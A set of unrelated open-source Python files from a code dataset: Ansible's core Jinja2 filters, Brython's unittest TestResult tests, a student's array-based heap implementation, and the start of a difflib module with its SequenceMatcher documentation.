raise errors.AnsibleFilterError('|password_hash requires the passlib python module to generate password hashes on Mac OS X/Darwin')
saltstring = "$%s$%s" % (cryptmethod[hashtype],salt)
encrypted = crypt.crypt(password, saltstring)
else:
if hashtype == 'blowfish':
cls = passlib.hash.bcrypt
else:
cls = getattr(passlib.hash, '%s_crypt' % hashtype)
encrypted = cls.encrypt(password, salt=salt)
return encrypted
return None
def to_uuid(string):
return str(uuid.uuid5(UUID_NAMESPACE_ANSIBLE, str(string)))
def mandatory(a):
from jinja2.runtime import Undefined
''' Make a variable mandatory '''
if isinstance(a, Undefined):
raise errors.AnsibleFilterError('Mandatory variable not defined.')
return a
def combine(*terms, **kwargs):
recursive = kwargs.get('recursive', False)
if len(kwargs) > 1 or (len(kwargs) == 1 and 'recursive' not in kwargs):
raise errors.AnsibleFilterError("'recursive' is the only valid keyword argument")
for t in terms:
if not isinstance(t, dict):
raise errors.AnsibleFilterError("|combine expects dictionaries, got " + repr(t))
if recursive:
return reduce(merge_hash, terms)
else:
return dict(itertools.chain(*map(iteritems, terms)))
def comment(text, style='plain', **kw):
# Predefined comment types
comment_styles = {
'plain': {
'decoration': '# '
},
'erlang': {
'decoration': '% '
},
'c': {
'decoration': '// '
},
'cblock': {
'beginning': '/*',
'decoration': ' * ',
'end': ' */'
},
'xml': {
'beginning': '<!--',
'decoration': ' - ',
'end': '-->'
}
}
# Pointer to the right comment type
style_params = comment_styles[style]
if 'decoration' in kw:
prepostfix = kw['decoration']
else:
prepostfix = style_params['decoration']
# Default params
p = {
'newline': '\n',
'beginning': '',
'prefix': (prepostfix).rstrip(),
'prefix_count': 1,
'decoration': '',
'postfix': (prepostfix).rstrip(),
'postfix_count': 1,
'end': ''
}
# Update default params
p.update(style_params)
p.update(kw)
# Compose substrings for the final string
str_beginning = ''
if p['beginning']:
str_beginning = "%s%s" % (p['beginning'], p['newline'])
str_prefix = ''
if p['prefix']:
if p['prefix'] != p['newline']:
str_prefix = str(
"%s%s" % (p['prefix'], p['newline'])) * int(p['prefix_count'])
else:
str_prefix = str(
"%s" % (p['newline'])) * int(p['prefix_count'])
str_text = ("%s%s" % (
p['decoration'],
# Prepend each line of the text with the decorator
text.replace(
p['newline'], "%s%s" % (p['newline'], p['decoration'])))).replace(
# Remove trailing spaces when only decorator is on the line
"%s%s" % (p['decoration'], p['newline']),
"%s%s" % (p['decoration'].rstrip(), p['newline']))
str_postfix = p['newline'].join(
[''] + [p['postfix'] for x in range(p['postfix_count'])])
str_end = ''
if p['end']:
str_end = "%s%s" % (p['newline'], p['end'])
# Return the final string
return "%s%s%s%s%s" % (
str_beginning,
str_prefix,
str_text,
str_postfix,
str_end)
def extract(item, container, morekeys=None):
from jinja2.runtime import Undefined
value = container[item]
if value is not Undefined and morekeys is not None:
if not isinstance(morekeys, list):
morekeys = [morekeys]
try:
value = reduce(lambda d, k: d[k], morekeys, value)
except KeyError:
value = Undefined()
return value
def failed(*a, **kw):
''' Test if task result yields failed '''
item = a[0]
if type(item) != dict:
raise errors.AnsibleFilterError("|failed expects a dictionary")
rc = item.get('rc',0)
failed = item.get('failed',False)
if rc != 0 or failed:
return True
else:
return False
def success(*a, **kw):
''' Test if task result yields success '''
return not failed(*a, **kw)
def changed(*a, **kw):
''' Test if task result yields changed '''
item = a[0]
if type(item) != dict:
raise errors.AnsibleFilterError("|changed expects a dictionary")
if not 'changed' in item:
changed = False
if ('results' in item # some modules return a 'results' key
and type(item['results']) == list
and type(item['results'][0]) == dict):
for result in item['results']:
changed = changed or result.get('changed', False)
else:
changed = item.get('changed', False)
return changed
def skipped(*a, **kw):
''' Test if task result yields skipped '''
item = a[0]
if type(item) != dict:
raise errors.AnsibleFilterError("|skipped expects a dictionary")
skipped = item.get('skipped', False)
return skipped
@environmentfilter
def do_groupby(environment, value, attribute):
"""Overridden groupby filter for jinja2, to address an issue with
jinja2>=2.9.0,<2.9.5 where a namedtuple was returned which
has repr that prevents ansible.template.safe_eval.safe_eval from being
able to parse and eval the data.
jinja2<2.9.0,>=2.9.5 is not affected, as <2.9.0 uses a tuple, and
>=2.9.5 uses a standard tuple repr on the namedtuple.
The adaptation here, is to run the jinja2 `do_groupby` function, and
cast all of the namedtuples to a regular tuple.
See https://github.com/ansible/ansible/issues/20098
We may be able to remove this in the future.
"""
return [tuple(t) for t in _do_groupby(environment, value, attribute)]
def b64encode(string):
return to_text(base64.b64encode(to_bytes(string, errors='surrogate_then_strict')))
def b64decode(string):
return to_text(base64.b64decode(to_bytes(string, errors='surrogate_then_strict')))
class FilterModule(object):
''' Ansible core jinja2 filters '''
def filters(self):
return {
# jinja2 overrides
'groupby': do_groupby,
# base 64
'b64decode': b64decode,
'b64encode': b64encode,
# uuid
'to_uuid': to_uuid,
# json
'to_json': to_json,
'to_nice_json': to_nice_json,
'from_json': json.loads,
# yaml
'to_yaml': to_yaml,
'to_nice_yaml': to_nice_yaml,
'from_yaml': from_yaml,
#date
'to_datetime': to_datetime,
# path
'basename': partial(unicode_wrap, os.path.basename),
'dirname': partial(unicode_wrap, os.path.dirname),
'expanduser': partial(unicode_wrap, os.path.expanduser),
'realpath': partial(unicode_wrap, os.path.realpath),
'relpath': partial(unicode_wrap, os.path.relpath),
'splitext': partial(unicode_wrap, os.path.splitext),
'win_basename': partial(unicode_wrap, ntpath.basename),
'win_dirname': partial(unicode_wrap, ntpath.dirname),
'win_splitdrive': partial(unicode_wrap, ntpath.splitdrive),
# value as boolean
'bool': to_bool,
# quote string for shell usage
'quote': quote,
# hash filters
# md5 hex digest of string
'md5': md5s,
# sha1 hex digeset of string
'sha1': checksum_s,
# checksum of string as used by ansible for checksuming files
'checksum': checksum_s,
# generic hashing
'password_hash': get_encrypted_password,
'hash': get_hash,
# file glob
'fileglob': fileglob,
# regex
'regex_replace': regex_replace,
'regex_escape': regex_escape,
'regex_search': regex_search,
'regex_findall': regex_findall,
# ? : ;
'ternary': ternary,
# list
# random stuff
'random': rand,
'shuffle': randomize_list,
# undefined
'mandatory': mandatory,
# merge dicts
'combine': combine,
# comment-style decoration
'comment': comment,
# array and dict lookups
'extract': extract,
# failure testing
'failed' : failed,
'failure' : failed,
'success' : success,
'succeeded' : success,
# changed testing
'changed' : changed,
'change' : changed,
# skip testing
'skipped' : skipped,
'skip' : skipped,
# debug
'type_debug': lambda o: o.__class__.__name__,
}
| gpl-3.0 |
40223245/w16b_test | static/Brython3.1.1-20150328-091302/Lib/unittest/test/test_result.py | 788 | 19069 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestTesultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 |
moiseslorap/RIT | Computer Science 1/Labs/lab11/array_heap.py | 2 | 7303 | """
A Heap implemented by
mapping a tree onto an array (Python list) of the same size.
file: array_heap.py
language: python3
new language feature: passing (and storing) functions as arguments.
"""
import copy
from rit_lib import *
# Utility functions to map tree relations to array indices ###
def parent(i):
"""
Return index of parent of node at index i.
"""
return (i - 1)//2
def lChild(i):
"""
Return index of left child of node at index i.
"""
return 2*i + 1
def rChild(i):
"""
Return index of right child of node at index i.
"""
return 2*i + 2
############################################################################
def createEmptyHeap(maxSize, compareFunc):
"""
createEmptyHeap : NatNum * Function -> Heap
Create an empty heap with capacity maxSize
and comparison function compareFunc.
Return initialized heap.
"""
heap = Heap([None for _ in range(maxSize)], 0, compareFunc)
return heap
class Heap(struct):
"""
A heap inside an array that may be bigger than the
heapified section of said array
SLOTS:
array: the Python list object used to store the heap
size: the number of array elements currently in the
heap. (size-1) is the index of the last element.
compareFunc: A function to compare values in the heap.
For example, if compareFunc performs less-than,
then the heap will be a min-heap.
"""
_slots = ((list, 'array'), (int, 'size'), (object, 'compareFunc'))
def displayHeap(self, startIndex=0, indent=""):
"""
displayHeap : Heap * NatNum * String -> NoneType
Display the heap as a tree with each child value indented
from its parent value. Traverse the tree in preorder.
"""
if startIndex < self.size:
print(indent + str(self.array[startIndex]))
self.displayHeap(lChild(startIndex), indent + ' ')
self.displayHeap(rChild(startIndex), indent + ' ')
def siftUp(self, startIndex):
"""
siftUp : Heap * NatNum -> NoneType
Move the value at startIndex up to its proper spot in
the given heap. Assume that the value does not have
to move down.
"""
i = startIndex
a = self.array
while i > 0 and not self.compareFunc(a[parent(i)], a[i]):
(a[parent(i)], a[i]) = (a[i], a[parent(i)]) # swap
i = parent(i)
def _first_of_3(self, index):
"""
_first_of_3 : Heap * NatNum -> NatNum
_first_of_3 is a private, utility function.
Look at the values at:
- index
- the left child position of index, if in the heap
- the right child position of index, if in the heap
and return the index of the value that should come
first, according to heap.compareFunc().
"""
lt = lChild(index)
rt = rChild(index)
thisVal = self.array[index]
if rt < self.size: # If there are both left and right children
lVal = self.array[lt]
rVal = self.array[rt]
if self.compareFunc(lVal, thisVal) \
or self.compareFunc(rVal, thisVal):
if self.compareFunc(lVal, rVal):
return lt # The left child goes first
else:
return rt # The right child goes first
else:
return index # This one goes first
elif lt < self.size: # If there is only a left child
lVal = self.array[lt]
if self.compareFunc(lVal, thisVal):
return lt # The left child goes first
else:
return index # This one goes first
else: # There are no children
return index
def siftDown(self, startIndex):
"""
siftDown : Heap * NatNum -> NoneType
Move the value at startIndex down to its proper spot in
the given heap. Assume that the value does not have
to move up.
"""
curIndex = startIndex
a = self.array
swapIndex = self._first_of_3( curIndex)
while (swapIndex != curIndex):
(a[swapIndex], a[curIndex]) = (a[curIndex], a[swapIndex]) # swap
curIndex = swapIndex
swapIndex = self._first_of_3(curIndex)
def add(self, newValue):
"""
add : Heap * Comparable -> NoneType
add inserts the element at the correct position in the heap.
"""
if self.size == len(self.array):
self.array = self.array + ([None] * len(self.array))
self.array[self.size] = newValue
self.siftUp(self.size)
self.size = self.size + 1
def remove(self):
"""
remove : Heap -> Comparable
remove removes and returns the root element in the heap.
"""
res = self.array[0]
self.size = self.size - 1
self.array[0] = self.array[self.size]
self.array[self.size] = None
self.siftDown(0)
return res
def updateValue(self, index, newValue):
"""
Fix the heap after changing the value in one of its nodes.
"""
oldValue = self.array[index]
self.array[index] = newValue
if self.compareFunc(newValue, oldValue):
self.siftUp(index)
else:
self.siftDown(index)
def peek(self):
"""
peek : Heap -> Comparable
peek returns a deep copy of the current root/top of the heap
"""
res = copy.deepcopy(self.array[0])
return res
############################################################################
def less(a, b):
"""
less : Comparable * Comparable -> Boolean
This ordering function returns True if the first value is smaller.
"""
return a <= b
def greater(a, b):
"""
greater : Comparable * Comparable -> Boolean
This ordering function returns True if the first value is larger.
"""
return a >= b
def testHeap( testData ):
"""
testHeap : TupleOfComparable -> NoneType
Create a min heap, fill it with the test data, and display it.
"""
print( "testHeap(", testData, "):" )
heap = createEmptyHeap(len(testData), less)
for i in range(len(testData)):
heap.add( testData[i])
if i % 2 == 0: print( i, "-th iteration's root:", heap.peek( ) )
print("Heap size is now", heap.size)
heap.displayHeap()
print()
# Perform some heap modifications. Tests updateValue().
for (index, value) in ((1, 100), (4, -1)):
print("Change value at position", index, "to", value)
heap.updateValue(index, value)
heap.displayHeap()
print( "current root:", heap.peek( ) )
if __name__ == '__main__':
testData = (1, 3, 5, 7, 9, 10, 8, 6, 4, 2, 0) # Test data
testHeap( testData )
| mit |
mchristopher/PokemonGo-DesktopMap | app/pywin/Lib/difflib.py | 19 | 82321 | """
Module difflib -- helpers for computing deltas between objects.
Function get_close_matches(word, possibilities, n=3, cutoff=0.6):
Use SequenceMatcher to return list of the best "good enough" matches.
Function context_diff(a, b):
For two lists of strings, return a delta in context diff format.
Function ndiff(a, b):
Return a delta: the difference between `a` and `b` (lists of strings).
Function restore(delta, which):
Return one of the two sequences that generated an ndiff delta.
Function unified_diff(a, b):
For two lists of strings, return a delta in unified diff format.
Class SequenceMatcher:
A flexible class for comparing pairs of sequences of any type.
Class Differ:
For producing human-readable deltas from sequences of lines of text.
Class HtmlDiff:
For producing HTML side by side comparison with change highlights.
"""
__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',
'Differ','IS_CHARACTER_JUNK', 'IS_LINE_JUNK', 'context_diff',
'unified_diff', 'HtmlDiff', 'Match']
import heapq
from collections import namedtuple as _namedtuple
from functools import reduce
Match = _namedtuple('Match', 'a b size')
def _calculate_ratio(matches, length):
if length:
return 2.0 * matches / length
return 1.0
class SequenceMatcher:
"""
SequenceMatcher is a flexible class for comparing pairs of sequences of
any type, so long as the sequence elements are hashable. The basic
algorithm predates, and is a little fancier than, an algorithm
published in the late 1980's by Ratcliff and Obershelp under the
hyperbolic name "gestalt pattern matching". The basic idea is to find
the longest contiguous matching subsequence that contains no "junk"
elements (R-O doesn't address junk). The same idea is then applied
recursively to the pieces of the sequences to the left and to the right
of the matching subsequence. This does not yield minimal edit
sequences, but does tend to yield matches that "look right" to people.
SequenceMatcher tries to compute a "human-friendly diff" between two
sequences. Unlike e.g. UNIX(tm) diff, the fundamental notion is the
longest *contiguous* & junk-free matching subsequence. That's what
catches peoples' eyes. The Windows(tm) windiff has another interesting
notion, pairing up elements that appear uniquely in each sequence.
That, and the method here, appear to yield more intuitive difference
reports than does diff. This method appears to be the least vulnerable
to synching up on blocks of "junk lines", though (like blank lines in
ordinary text files, or maybe "<P>" lines in HTML files). That may be
because this is the only method of the 3 that has a *concept* of
"junk" <wink>.
Example, comparing two strings, and considering blanks to be "junk":
>>> s = SequenceMatcher(lambda x: x == " ",
... "private Thread currentThread;",
... "private volatile Thread currentThread;")
>>>
.ratio() returns a float in [0, 1], measuring the "similarity" of the
sequences. As a rule of thumb, a .ratio() value over 0.6 means the
sequences are close matches:
>>> print round(s.ratio(), 3)
0.866
>>>
If you're only interested in where the sequences match,
.get_matching_blocks() is handy:
>>> for block in s.get_matching_blocks():
... print "a[%d] and b[%d] match for %d elements" % block
a[0] and b[0] match for 8 elements
a[8] and b[17] match for 21 elements
a[29] and b[38] match for 0 elements
Note that the last tuple returned by .get_matching_blocks() is always a
dummy, (len(a), len(b), 0), and this is the only case in which the last
tuple element (number of elements matched) is 0.
If you want to know how to change the first sequence into the second,
use .get_opcodes():
>>> for opcode in s.get_opcodes():
... print "%6s a[%d:%d] b[%d:%d]" % opcode
equal a[0:8] b[0:8]
insert a[8:8] b[8:17]
equal a[8:29] b[17:38]
See the Differ class for a fancy human-friendly file differencer, which
uses SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
See also function get_close_matches() in this module, which shows how
simple code building on SequenceMatcher can be used to do useful work.
Timing: Basic R-O is cubic time worst case and quadratic time expected
case. SequenceMatcher is quadratic time for the worst case and has
expected-case behavior dependent in a complicated way on how many
elements the sequences have in common; best case time is linear.
Methods:
__init__(isjunk=None, a='', b='')
Construct a SequenceMatcher.
set_seqs(a, b)
Set the two sequences to be compared.
set_seq1(a)
Set the first sequence to be compared.
set_seq2(b)
Set the second sequence to be compared.
find_longest_match(alo, ahi, blo, bhi)
Find longest matching block in a[alo:ahi] and b[blo:bhi].
get_matching_blocks()
Return list of triples describing matching subsequences.
get_opcodes()
Return list of 5-tuples describing how to turn a into b.
ratio()
Return a measure of the sequences' similarity (float in [0,1]).
quick_ratio()
Return an upper bound on .ratio() relatively quickly.
real_quick_ratio()
Return an upper bound on ratio() very quickly.
"""
def __init__(self, isjunk=None, a='', b='', autojunk=True):
"""Construct a SequenceMatcher.
Optional arg isjunk is None (the default), or a one-argument
function that takes a sequence element and returns true iff the
element is junk. None is equivalent to passing "lambda x: 0", i.e.
no elements are considered to be junk. For example, pass
lambda x: x in " \\t"
if you're comparing lines as sequences of characters, and don't
want to synch up on blanks or hard tabs.
Optional arg a is the first of two sequences to be compared. By
default, an empty string. The elements of a must be hashable. See
also .set_seqs() and .set_seq1().
Optional arg b is the second of two sequences to be compared. By
default, an empty string. The elements of b must be hashable. See
also .set_seqs() and .set_seq2().
Optional arg autojunk should be set to False to disable the
"automatic junk heuristic" that treats popular elements as junk
(see module documentation for more information).
"""
# Members:
# a
# first sequence
# b
# second sequence; differences are computed as "what do
# we need to do to 'a' to change it into 'b'?"
# b2j
# for x in b, b2j[x] is a list of the indices (into b)
# at which x appears; junk elements do not appear
# fullbcount
# for x in b, fullbcount[x] == the number of times x
# appears in b; only materialized if really needed (used
# only for computing quick_ratio())
# matching_blocks
# a list of (i, j, k) triples, where a[i:i+k] == b[j:j+k];
# ascending & non-overlapping in i and in j; terminated by
# a dummy (len(a), len(b), 0) sentinel
# opcodes
# a list of (tag, i1, i2, j1, j2) tuples, where tag is
# one of
# 'replace' a[i1:i2] should be replaced by b[j1:j2]
# 'delete' a[i1:i2] should be deleted
# 'insert' b[j1:j2] should be inserted
# 'equal' a[i1:i2] == b[j1:j2]
# isjunk
# a user-supplied function taking a sequence element and
# returning true iff the element is "junk" -- this has
# subtle but helpful effects on the algorithm, which I'll
# get around to writing up someday <0.9 wink>.
# DON'T USE! Only __chain_b uses this. Use isbjunk.
